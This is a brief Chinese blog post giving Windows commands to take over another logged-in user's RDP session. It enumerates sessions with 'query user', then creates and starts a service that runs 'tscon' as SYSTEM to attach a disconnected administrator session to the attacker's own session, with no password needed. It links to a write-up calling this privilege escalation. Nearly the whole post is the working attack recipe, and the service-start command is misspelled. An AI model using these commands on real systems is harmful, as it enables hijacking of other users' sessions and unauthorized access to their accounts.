windows切换其他登陆用户

发表于 2017-03-20 | 分类于奇技淫巧

查看用户:

C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:\Windows\system32>

创建服务：

1 2	C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55" [SC] CreateService SUCCESS

启动服务：

1	net setart sesshijack

细节：
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

------本文结束，感谢阅读------

本文作者： Evi1cg
本文链接： https://evi1cg.github.io/archives/change_user.html
版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！

Evi1cg

此博客主要用来记录自己技术生涯中所学的一些知识,用来分享和备忘。

RSS

GitHub Twitter 微博 E-Mail